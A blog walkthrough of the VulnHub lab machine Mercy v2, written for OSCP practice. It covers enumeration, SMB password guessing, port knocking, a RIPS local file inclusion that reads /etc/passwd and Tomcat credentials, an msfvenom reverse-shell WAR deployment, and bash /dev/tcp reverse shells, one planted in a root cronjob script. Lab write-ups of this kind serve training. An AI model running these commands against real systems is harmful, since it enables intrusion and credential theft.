Digitalworld Mercy Vulnhub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.

Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

I liked this box, and it reminds me of OSCP exam machines and good Hack The Box machines. There’s enumeration across multiple services, uses different vulnerability exploitations, and has three different stages of initial access, user account, and root access. I love the 3 stage access option because I’m used to it with Hack The Box, but OSCP machines don’t always have 3 stages.

Luckily much of the stuff that is important for me solving this box was in the Nmap output. There would be possible rabbit holes if I missed that. It really makes me think that I missed stuff in the exam that prohibited me from having a full picture to help me solve machines in my OSCP exam. I am glad I am working on purposefully ensuring my enumeration is good, and I take good notes (even the stuff that doesn’t work/work out).

This machine would have been more difficult if there were not any robot.txt files.

Flow

  1. Enumerate ports
  2. Port 8080 – /tryharder/tryharder
  3. SMB qiu share works with qiu:password (clue from tryharder file)
  4. Download qiu files from SMB share
  5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
  6. Find LFI in RIPS 0.53 on port 80
  7. Read files on filesystem via LFI
    1. Read /etc/passwd to get local usernames
    2. Read tomcat configuration to get more logins (tomcat admin and local user)
  8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
  9. Pivot to fluffy user
  10. Pop a root shell from a root cronjob, editing a file writable by fluffy
  11. Get flag

Initial Enumeration

IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP

Top 1000 TCP Ports

# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  filtered ssh
53/tcp  open     domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp  filtered http
110/tcp open     pop3        Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open     imap        Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more capabilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open     ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open     ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: mercy
|   NetBIOS computer name: MERCY\x00
|   Domain name: \x00
|   FQDN: mercy
|_  System time: 2020-06-15T00:49:10+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-14T16:49:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds

Remaining 1000+ TCP Ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry 
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

UDP Top 1000 Ports

# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT    STATE         SERVICE
53/udp  open          domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
123/udp open          ntp
| ntp-info: 
|_  
137/udp open          netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)

Host script results:
|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds

SMB Enumeration

[13:21:03]🔥root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132 
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18]🔥root[ /home/kali/VulnHub/mercy ]# 

So, qui is interesting. Keep track of that as a possible user.

TCP 8080 – /tryharder/tryharder Step

Nmap noticed that robots.txt and a path exists.

robots.txt

http://10.88.42.132:8080/robots.txt
User-agent: *
Disallow: /tryharder/tryharder

/tryharder/tryharder

SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==

It is base64; once decoded, it decoded into the text below.

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

Port 8080 – Normal

Attempting to access the manager/admin interface for Tomcat requires a login. So, we need a login (which should be no surprise). It is Tomcat 7.

SMB Share – qiu

I am a dummy here again. I get that the “password” is clearly spelled out, but I was used to being tricked for some reason, so I used the entire tryharder decoded file contents word by word to find it.

for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null ; done

Which stopped for the password of “password” works. After that, I literally said to myself, “you’re a dummy.”

We can log in directly.

Now we should download all the files.

prompt
recurse
mget *

The only important files are config and configprint, with configprint appending configuration files to the config file. It includes multiple configs, but the one we care about is the knockd configuration because ports 80 and 22 are filtered (and likely firewalled off).

configprint

#!/bin/bash

echo "Here are settings for your perusal." > config
echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
echo "For other details of MERCY, please contact your system administrator." >> config

chown qiu:qiu config

config (knockd parts of interest)

...

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

...

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
...

Knock Knock

for port in 17301 28504 9999; do nc 10.88.42.132 $port; done
for port in 159 27391 4; do nc 10.88.42.132 $port; done

Enumerate Port 22

# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
|   2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
|   256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_  256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds

There is nothing special there, other than knowing it is Ubuntu, so at least we can discern file paths (for later).

I tried the qiu login, and it didn’t work for SSH.

Port 80

Enumerate

# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds

Nmap found the robots.txt file and showed the contents. Let’s look at it more.

robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

Port 80 – /mercy

Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.

I made a mental note of that. It rang a bell later.

Port 80 – /nomercy

It is running RIPS 0.53. So what is the first thing I should do when I find a web app with a version I never heard of… well, I do searchsploit.

There’s an LFI. The LFI also works.

http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

Or to grab it with the garbage removed.

wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd | awk -F'? ' '{print $2}'
...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

Getting The Tomcat Configuration Files

I wasn’t sure where Ubuntu stored Tomcat files, so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory, and I am now looking for these files.

/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties

So I grabbed them all and saved them locally, and converted the HTML entities back to ASCII.

for file in server.xml tomcat-users.xml web.xml catalina.properties; do wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/$file | awk -F'? ' '{print $2}' | sed -e 's/&quot;/"/g' -e 's/&gt;/>/g' -e 's/&lt;/</g' > $file ; done

With some logins found and the admin/manager was in it.

thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny

Now that we have to Tomcat admin login, time to try to log in with it.

Port 8080 – Tomcat Revisited

thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)

Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.

Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the admin/manager interface, and then browse to the uploaded application, which pops a reverse shell.

Generate the reverse shell .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war

Start a netcat listener

nc -lvnp 4444

Upload the war file

WAR file to deploy Select WAR file to upload Locate .war and deploy No file selected. Deploy

Spawn reverse shell

click me Stop Start Expire sessions Reload with idle 30 Undeploy minutes

Gain Access To The Machine And Pivot To fluffy

The only other creds I have are for fluffy, so su to that user, and look around.

timeclock Script

#!/bin/bash 

now=$(date) 
echo "The system time is: $now." > ../../../../../var/www/html/time 
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time 
chown www-data:www-data ../../../../../var/www/html/time

An interesting script. It ties together with the port 80 /mercy clue. I didn’t look further and honed in on this. Instead, I checked the timestamp on the time file and checked if fluffy’s crontab was doing it. The file was recently updated, and fluffy didn’t have a crontab. So, I assumed it was root or pleadformercy (with elevated perms to do the chown).

So, I worked to get another reverse shell!

I tested to see if I could get a reverse shell as with nc.

[email protected]:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
[email protected]:~/.private/secrets$

I pulled up the trusty pentestmoney reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to get the bash syntax or the other nc one with pipes. The bash one worked!

bash -i >& /dev/tcp/10.88.42.133/9000 0>&1

Getting The root Shell

echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock

And root shell popped!

Get The Flags

Leave a Reply

Your email address will not be published. Required fields are marked *